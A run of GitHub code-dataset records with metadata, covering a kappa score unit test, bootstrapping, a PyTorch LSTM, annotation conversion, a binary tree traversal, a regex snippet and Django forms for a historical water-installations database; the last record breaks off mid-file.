sparsity = 0\n \n \n self.model.masks = masks\n self.model.sparsity = sparsity\n \n\n","repo_name":"elliottpiercy/prunpy","sub_path":"utils/prune/magnitude_threshold_pruning.py","file_name":"magnitude_threshold_pruning.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1979816564","text":"# -*- coding:utf-8 -*-\n\"\"\"\n ..\n ---------------------------------------------------------------------\n ___ __ __ __ ___\n / | \\ | \\ | \\ / the automatic\n \\__ |__/ |__/ |___| \\__ annotation and\n \\ | | | | \\ analysis\n ___/ | | | | ___/ of speech\n\n http://www.sppas.org/\n\n Use of this software is governed by the GNU Public License, version 3.\n\n SPPAS is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n SPPAS is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with SPPAS. If not, see .\n\n This banner notice must not be removed.\n\n ---------------------------------------------------------------------\n\n src.calculus.tests.test_kappa.py\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nimport unittest\n\nfrom sppas.src.calculus.scoring.kappa import sppasKappa\n\n# ---------------------------------------------------------------------------\n\n\nclass TestVectorKappa(unittest.TestCase):\n\n def setUp(self):\n self.p = [(1.0, 0.0), (0.0, 1.0), (0.0, 1.0), (1.0, 0.0), (1.0, 0.0)]\n self.q = [(1.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 0.0), (1.0, 0.0)]\n\n def test_kappa(self):\n kappa = sppasKappa(self.p, self.q)\n self.assertTrue(kappa.check()) # check both p and q\n self.assertFalse(kappa.check_vector([(0., 1.), (0., 1., 0.)]))\n self.assertFalse(kappa.check_vector([(0.0, 0.1)]))\n v = kappa.evaluate()\n self.assertEqual(0.54545, round(v, 5))\n\n def test_kappa3(self):\n p = [(1., 0., 0.), (0., 0., 1.), (0., 1., 0.), (1., 0., 0.), (0., 0., 1.)]\n q = [(0., 0., 1.), (0., 0., 1.), (1., 0., 0.), (0., 1., 0.), (0., 0., 1.)]\n kappa = sppasKappa(p, q)\n v = kappa.evaluate()\n self.assertEqual(0.0625, round(v, 5))\n","repo_name":"mirfan899/CTTS","sub_path":"sppas/sppas/src/calculus/tests/test_kappa.py","file_name":"test_kappa.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"14398263256","text":"''' Implement bootstrapping (resampling) \n https://en.wikipedia.org/wiki/Bootstrapping_(statistics)\n'''\n\nimport random\nimport numpy as np\n\ndef boot_strapped_quantiles( data, f, n, quantiles = [0.0445, 0.3173, 0.5, 1-0.3173, 1-0.0445]):\n ''' make n replica data sets (of the same size) by random sampling the original data with replacements.\n Evaluate a function on the replicas and compute the quantiles of the results.''' \n replica_values = sorted(map( f, ( [random.choice(data) for _ in range(len(data))] for _ in range(n) ) ) )\n return [ np.quantile( replica_values, q ) for q in quantiles ]\n\nif __name__ == \"__main__\":\n\n n = 1000\n sample = [ random.gauss(0,1) for i in range(1000) ]\n mean = lambda data:sum(data)/float(len(data))\n\n quantiles = boot_strapped_quantiles( sample, mean, 1000 )\n \n","repo_name":"HephyAnalysisSW/TMB","sub_path":"plots/plotsNiki/bootstrapping.py","file_name":"bootstrapping.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35952953595","text":"# Uses python3\n# There are two ways of running this program:\n# 1. Run\n# python3 APlusB.py\n# then enter two numbers and press ctrl-d/ctrl-z\n# 2. Save two numbers to a file -- say, dataset.txt.\n# Then run\n# python3 APlusB.py < dataset.txt\n\nimport sys\n\n\nclass AplusB:\n def add_numbers(self, vala, valb):\n return vala + valb\n\n\ndef main():\n values = sys.stdin.read()\n tokens = values.split()\n a = int(tokens[0])\n b = int(tokens[1])\n\n print(AplusB().add_numbers(a, b))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"seanfeehan/algorithmictoolbox","sub_path":"AplusB/AplusB.py","file_name":"AplusB.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26687625099","text":"# Simple Rendering Aspect for 38Engine\n# Sushil Louis\n\n#from vector import Vector3\nimport utils\nimport math\nimport ogre.renderer.OGRE as ogre\n\nclass Renderer:\n def __init__(self, ent):\n self.ent = ent\n #print \"Rendering seting up for: \", str(self.ent)\n self.gent = self.ent.engine.gfxMgr.sceneManager.createEntity(self.ent.uiname + \"_ogreEnt\", self.ent.mesh)\n #self.gent.setMaterialName(self.ent.material)\n self.node = self.ent.engine.gfxMgr.sceneManager.getRootSceneNode().createChildSceneNode(self.ent.uiname + 'node', ent.pos)\n self.node.attachObject(self.gent)\n #self.node.setScale(self.ent.scale,self.ent.scale,self.ent.scale)\n \n \n def tick(self, dtime):\n #----------update scene node position and orientation-----------------------------------\n self.node.setPosition(self.ent.pos)\n self.node.resetOrientation()\n self.node.yaw(ogre.Radian(self.ent.heading))\n #if self.ent.isSelected:\n # self.node.showBoundingBox(True)\n #else:\n # self.node.showBoundingBox(False)\n\n","repo_name":"jflorespadilla/SchoolProjects","sub_path":"python/cs381_GameDevPipeline/StumpysGrove/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31897192256","text":"import torch\nfrom torch import nn\n\n\nclass ShallowRegressionLSTM(nn.Module):\n '''https://www.crosstab.io/articles/time-series-pytorch-lstm/'''\n\n def __init__(self, num_features, hidden_units):\n super().__init__()\n self.num_sensors = num_features # this is the number of features\n self.hidden_units = hidden_units\n self.num_layers = 1\n\n self.lstm = nn.LSTM(\n input_size=num_features,\n hidden_size=hidden_units,\n batch_first=True,\n num_layers=self.num_layers\n )\n\n self.linear = nn.Linear(in_features=self.hidden_units, out_features=1)\n\n def forward(self, x):\n batch_size = x.shape[0]\n h0 = torch.zeros(self.num_layers, batch_size,\n self.hidden_units).requires_grad_()\n c0 = torch.zeros(self.num_layers, batch_size,\n self.hidden_units).requires_grad_()\n\n _, (hn, _) = self.lstm(x, (h0, c0))\n # First dim of Hn is num_layers, which is set to 1 above.\n out = self.linear(hn[0]).flatten()\n\n return out\n","repo_name":"ebron01/pump-project","sub_path":"code/models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27433438536","text":"import os\nimport csv\n\n\nTARGET_IMAGE_SIZE = 832\n\ninput_path = '/opt/ml/processing/input/annotations/'\noutput_path = '/opt/ml/processing/output/{}/annotations/'.format(TARGET_IMAGE_SIZE)\n\nif not os.path.exists(output_path):\n os.makedirs(output_path)\n\n\ncolumns = ['file_name', 'x1', 'y1', 'x2', 'y2', 'class', 'image_width', 'image_height']\n\nfor group in ['train', 'val', 'test']:\n\n input_file = \"annotations_\" + group + \".csv\"\n with open(os.path.join(input_path, input_file), 'r', newline='') as csvfile:\n\n data = csv.DictReader(csvfile, fieldnames=columns)\n\n for row in data:\n\n x_center = int(row['x1']) + int(row['x2']) / 2.0\n y_center = int(row['y1']) + int(row['y2']) / 2.0\n obj_width = int(row['x2']) - int(row['x1'])\n obj_height = int(row['y2']) - int(row['y1'])\n\n x = round(x_center / int(row['image_width']), 8)\n y = round(y_center / int(row['image_height']), 8)\n w = round(obj_width / int(row['image_width']), 8)\n h = round(obj_height / int(row['image_height']), 8)\n\n output_row = f'0 {x} {y} {w} {h}\\n'\n\n image_name, _ = os.path.splitext(row['file_name'])\n output_file = image_name + '.txt'\n\n with open(os.path.join(output_path, output_file), 'a') as output_file:\n output_file.write(output_row)\n","repo_name":"solita/aiga-mlops-pipeline-aws","sub_path":"preprocessing/sagemaker/reannotate_images.py","file_name":"reannotate_images.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25488781043","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/binary-tree-level-order-traversal/\n# Author: Miao Zhang\n# Date: 2021-01-18\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n res = []\n if root is None: \n return res\n queue = deque()\n queue.append(root)\n while queue:\n n = len(queue)\n tmp = []\n for _ in range(n):\n node = queue.popleft()\n tmp.append(node.val)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n res.append(tmp)\n return res\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/binaryTreeLevelOrderTraversal/binaryTreeLevelOrderTraversal.py","file_name":"binaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3471233268","text":"'https://www.guru99.com/python-regular-expressions-complete-tutorial.html'\n\n'''\nre.match() function of re in Python will search the regular expression pattern at the BEGINNING of the string and return the first occurrence. \nThe Python RegEx Match method checks for a match only at the beginning of the string. \nSo, if a match is found in the first line, it returns the match object. \nBut if a match is found in some other line, the Python RegEx Match function returns null.\n\nFor example, consider the following code of Python re.match() function. \nThe expression “w+” and “\\W” will match the words starting with letter ‘g’ and thereafter, anything which is not started with ‘g’ is not identified. \nTo check match for each element in the list or string, we run the for loop in this Python re.match() Example.\n'''\n\nimport re\n\nmy_list = ['guru99 get', 'guru99 give', 'guru Selenium']\n\nfor item in my_list:\n z = re.match('(g\\w+)\\W(g\\w+)', item)\n \n if z:\n print(z.groups())","repo_name":"H0r4c3/Python_00_ALL","sub_path":"Regex/re.match().py","file_name":"re.match().py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24459708100","text":"from crispy_forms.bootstrap import FormActions\nfrom crispy_forms.layout import Submit, Layout, Fieldset, HTML\nfrom django.forms import ModelForm, inlineformset_factory\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.models import User\nfrom django import forms\n\nfrom .models import City, Institution, Person, UserProfileInfo\nfrom .models import *\nfrom utils.view_util import generate_num\nfrom crispy_forms.helper import FormHelper\nfrom django_select2 import forms as s2forms\nfrom django.forms.widgets import ClearableFileInput\n\n\n# Widgets\nclass InstitutionTypeWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass InstitutionTypeWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass CityWidget(s2forms.ModelSelect2Widget):\n search_fields = ['name__icontains']\n\n\nclass NeighbourhoodWidget(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n 'neighbourhood_number__icontains',\n 'city__name__icontains',\n ]\n\n\nclass NeighbourhoodWidget2(s2forms.ModelSelect2Widget): # this is for o\n search_fields = [\n 'neighbourhood_number__icontains',\n 'city__name__icontains',\n ]\n\n\nclass ReligionWidget(s2forms.ModelSelect2Widget):\n search_fields = ['name__icontains']\n\n\nclass SecondaryLiteratureWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n ]\n\n\nclass SecondaryLiteratureWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n ]\n\n\nclass EvidenceWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n \"un_title__icontains\",\n \"un_author__icontains\",\n ]\n\n\nclass EvidenceWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n \"title__icontains\",\n \"author__icontains\",\n \"un_title__icontains\",\n \"un_author__icontains\",\n ]\n\n\nclass WatersystemWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'original_term__icontains',\n 'un_original_term__icontains',\n ]\n\n\nclass WatersystemWidgetMulti(s2forms.ModelSelect2MultipleWidget):\n search_fields = [\n 'original_term__icontains',\n 'un_original_term__icontains',\n ]\n\n\nclass PurposeWidget(s2forms.ModelSelect2MultipleWidget):\n model = Purpose\n search_fields = ['name__icontains']\n\n\nclass InstallationWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass InstitutionWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass PersonWidget(s2forms.ModelSelect2Widget):\n search_fields = [\n 'name__icontains',\n 'un_name__icontains',\n ]\n\n\nclass StyleWidget(s2forms.ModelSelect2Widget):\n search_fields = ['name__icontains', ]\n\n\n# User form\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput())\n\n class Meta():\n model = User\n fields = ('username', 'email', 'password')\n\n\nclass UserProfileInfoForm(forms.ModelForm):\n class Meta():\n model = UserProfileInfo\n # fields = ('portfolio_site', 'profile_pic')\n fields = ()\n\n\n#\nclass CityForm(ModelForm):\n class Meta:\n model = City\n fields = ['name', 'latitude', 'longitude']\n # its possible to use following line for all fields, also exclude\n # fields = '__all__'\n labels = {\n 'name': 'City Name'\n }\n\n def __init__(self, *args, **kwargs):\n super(CityForm, self).__init__(*args, **kwargs)\n # self.fields['country'].empty_label = \"Select\"\n self.fields['latitude'].required = False\n self.fields['longitude'].required = False\n self.helper = FormHelper()\n\n\nclass InstitutionForm(ModelForm):\n class Meta:\n model = Institution\n fields = '__all__'\n\n type = forms.ModelChoiceField(\n queryset=InstitutionType.objects.all(),\n # this line refreshes the list when a new item is entered using the plus button\n widget=InstitutionTypeWidget(\n attrs={'data-placeholder': 'Select institution type',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n\n type_many = forms.ModelMultipleChoiceField(\n queryset=InstitutionType.objects.all(),\n widget=InstitutionTypeWidgetMulti(\n attrs={'data-placeholder': 'Select institution type',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n purpose = forms.ModelMultipleChoiceField(\n queryset=Purpose.objects.all(),\n widget=PurposeWidget(\n attrs={'data-placeholder': 'Select purposes',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n neighbourhood = forms.ModelMultipleChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n latitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Latitude'}))\n longitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Longitude'}))\n start_date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n start_date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n first_reference_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n first_reference_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n end_date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n end_date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n religion = forms.ModelChoiceField(\n queryset=Religion.objects.all(),\n widget=ReligionWidget(\n attrs={'data-placeholder': 'Select religion',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n secondary_literature = forms.ModelMultipleChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidgetMulti(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n comment = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n\n status = forms.BooleanField()\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get('instance', None)\n super(InstitutionForm, self).__init__(*args, **kwargs)\n self.fields['type_many'].required = False\n self.fields['city'].required = False\n self.fields['neighbourhood'].required = False\n self.fields['latitude'].required = False\n self.fields['longitude'].required = False\n self.fields['start_date_lower'].required = False\n self.fields['start_date_upper'].required = False\n self.fields['first_reference_lower'].required = False\n self.fields['first_reference_upper'].required = False\n self.fields['end_date_lower'].required = False\n self.fields['end_date_upper'].required = False\n self.fields['religion'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['status'].required = False\n\n if not instance:\n self.initial['name'] = 'Institution-' + str(generate_num('installations', 'Institution')).zfill(4)\n\n\nclass PersonForm(ModelForm):\n class Meta:\n model = Person\n fields = '__all__'\n widgets = {\n \"religion\": ReligionWidget(attrs={'data-placeholder': 'Select religion',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n \"evidence\": EvidenceWidget(attrs={'data-placeholder': 'Select evidence',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n }\n\n birth_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n birth_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n death_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n death_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n secondary_literature = forms.ModelMultipleChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidgetMulti(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n comment = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n status = forms.BooleanField()\n\n def __init__(self, *args, **kwargs):\n super(PersonForm, self).__init__(*args, **kwargs)\n self.fields['gender'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['birth_lower'].required = False\n self.fields['birth_upper'].required = False\n self.fields['death_lower'].required = False\n self.fields['death_upper'].required = False\n self.fields['status'].required = False\n # self.fields['religion'].empty_label = \"Select religion\"\n self.fields['secondary_literature'].empty_label = \"Select secondary literature\"\n self.fields['gender'].empty_label = \"Select gender\"\n\n\nclass SecondaryLiteratureForm(ModelForm):\n class Meta:\n model = SecondaryLiterature\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(SecondaryLiteratureForm, self).__init__(*args, **kwargs)\n self.fields['journal'].required = False\n self.fields['publisher'].required = False\n self.fields['year'].required = False\n self.fields['status'].required = False\n\n\nclass InstallationForm(ModelForm):\n watersystem = forms.ModelChoiceField(\n queryset=Watersystem.objects.all(), # this line refreshes the list when new item is entered using plus button\n widget=WatersystemWidget(\n attrs={'data-placeholder': 'Select a water system',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n construction_date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n construction_date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n first_reference_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n first_reference_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n end_functioning_year_lower = forms.CharField(\n widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n end_functioning_year_upper = forms.CharField(\n widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n purpose = forms.ModelMultipleChoiceField(\n queryset=Purpose.objects.all().order_by('name'),\n widget=PurposeWidget(\n attrs={'data-placeholder': 'Select purposes',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n neighbourhood = forms.ModelMultipleChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n latitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Latitude'}))\n longitude = forms.DecimalField(max_digits=8, decimal_places=5,\n widget=forms.NumberInput(attrs={'placeholder': 'Longitude'}))\n institution_as_location = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution as location ',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n extent_shapefile = forms.FileField(widget=forms.ClearableFileInput)\n secondary_literature = forms.ModelMultipleChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidgetMulti(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n comment = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n\n status = forms.BooleanField()\n\n class Meta:\n model = Installation\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get('instance', None)\n super(InstallationForm, self).__init__(*args, **kwargs)\n self.fields['watersystem'].required = False\n self.fields['construction_date_lower'].required = False\n self.fields['construction_date_upper'].required = False\n self.fields['first_reference_lower'].required = False\n self.fields['first_reference_upper'].required = False\n self.fields['end_functioning_year_lower'].required = False\n self.fields['end_functioning_year_upper'].required = False\n self.fields['purpose'].required = False\n self.fields['city'].required = False\n self.fields['neighbourhood'].required = False\n self.fields['latitude'].required = False\n self.fields['longitude'].required = False\n self.fields['institution_as_location'].required = False\n self.fields['extent_shapefile'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['comment'].required = False\n self.fields['status'].required = False\n\n if not instance:\n self.initial['name'] = 'Installation-' + str(generate_num('installations', 'Installation')).zfill(4)\n\n\nclass EvidenceForm(ModelForm):\n date_lower = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter lower bound'}))\n date_upper = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Please enter upper bound'}))\n secondary_literature = forms.ModelChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidget(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}),\n required=False)\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n status = forms.BooleanField()\n\n class Meta:\n model = Evidence\n fields = ('title', 'author', 'date_lower', 'date_upper', 'secondary_literature', 'description', 'status')\n\n def __init__(self, *args, **kwargs):\n super(EvidenceForm, self).__init__(*args, **kwargs)\n self.fields['author'].required = False\n self.fields['date_lower'].required = False\n self.fields['date_upper'].required = False\n self.fields['status'].required = False\n\n\n# Landmarks\nclass FigureForm(ModelForm):\n style = forms.ModelChoiceField(\n queryset=Style.objects.all(),\n widget=StyleWidget(\n attrs={'data-placeholder': 'Select style',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n start_date = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'start date'}))\n\n end_date = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'end date'}))\n neighbourhood = forms.ModelMultipleChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 4}))\n\n class Meta:\n model = Figure\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get('instance', None)\n super(FigureForm, self).__init__(*args, **kwargs)\n self.fields['style'].required = True\n self.fields['start_date'].required = False\n self.fields['end_date'].required = False\n self.fields['city'].required = False\n self.fields['description'].required = False\n self.fields['neighbourhood'].required = False\n self.fields['geojson'].required = True\n\n\nclass WatersystemForm(ModelForm):\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}))\n secondary_literature = forms.ModelChoiceField(\n queryset=SecondaryLiterature.objects.all(),\n widget=SecondaryLiteratureWidget(\n attrs={'data-placeholder': 'Select secondary literature',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = Watersystem\n fields = ('original_term', 'type', 'secondary_literature', 'description')\n\n def __init__(self, *args, **kwargs):\n super(WatersystemForm, self).__init__(*args, **kwargs)\n self.fields['type'].required = False\n self.fields['secondary_literature'].required = False\n self.fields['description'].required = False\n\n\nclass WatersystemCategoriesForm(ModelForm):\n watersystem = forms.ModelMultipleChoiceField(\n queryset=Watersystem.objects.all(),\n widget=WatersystemWidgetMulti(\n attrs={'data-placeholder': 'Select water systems',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n description = forms.CharField(widget=forms.Textarea(\n attrs={'style': 'width:100%', 'rows': 3}),\n required=False)\n\n class Meta:\n model = WatersystemCategories\n fields = ('name', 'watersystem', 'description')\n\n def __init__(self, *args, **kwargs):\n super(WatersystemCategoriesForm, self).__init__(*args, **kwargs)\n self.fields['name'].required = True\n self.fields['watersystem'].required = False\n self.fields['description'].required = False\n\n\nclass NeighbourhoodForms(ModelForm):\n extent_shapefile = forms.FileField(widget=forms.ClearableFileInput)\n\n style = forms.ModelChoiceField(\n queryset=Style.objects.all(),\n widget=StyleWidget(\n attrs={'data-placeholder': 'Select style',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = Neighbourhood\n fields = ('city', 'neighbourhood_number', 'style', 'extent_shapefile')\n\n def __init__(self, *args, **kwargs):\n super(NeighbourhoodForms, self).__init__(*args, **kwargs)\n self.fields['style'].required = False\n\n\nclass InstitutionTypeForms(ModelForm):\n name = forms.CharField()\n\n class Meta:\n model = InstitutionType\n fields = ('name', 'description')\n\n\n# Relations form\nclass CityPersonRelationForm(ModelForm):\n city = forms.ModelChoiceField(\n queryset=City.objects.all(),\n widget=CityWidget(\n attrs={'data-placeholder': 'Select city',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = CityPersonRelation\n fields = ('city', 'person', 'type_of_involvement')\n # widget = {\n # \"city\": CityWidget,\n # }\n\n\nclass NeighbourhoodPersonRelationForm(ModelForm):\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n neighbourhood = forms.ModelChoiceField(\n queryset=Neighbourhood.objects.all(),\n widget=NeighbourhoodWidget2(\n attrs={'data-placeholder': 'Select neighbourhood',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = NeighbourhoodPersonRelation\n fields = ('neighbourhood', 'person', 'type_of_involvement')\n\n\nclass PersonInstitutionRelationForm(ModelForm):\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select a person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n institution = forms.ModelChoiceField(\n queryset=Institution.objects.all(),\n widget=InstitutionWidget(\n attrs={'data-placeholder': 'Select institution',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = PersonInstitutionRelation\n fields = ('person', 'institution', 'type_of_involvement')\n\n\nclass PersonInstallationRelationForm(ModelForm):\n person = forms.ModelChoiceField(\n queryset=Person.objects.all(),\n widget=PersonWidget(\n attrs={'data-placeholder': 'Select a person',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n installation = forms.ModelChoiceField(\n queryset=Installation.objects.all(),\n widget=InstallationWidget(\n attrs={'data-placeholder': 'Select installation',\n 'style': 'width:100%;', 'class': 'searching',\n 'data-minimum-input-length': '1'}))\n\n class Meta:\n model = PersonInstallationRelation\n fields = ('person', 'installation', 'type_of_involvement')\n\n\nclass EvidencePersonRelationForm(ModelForm):\n evidence = forms.ModelChoiceField(\n queryset=Evidence.objects.all(),\n widget=EvidenceWidget(\n attrs={'data-placeholder': 'Select evidence',\n 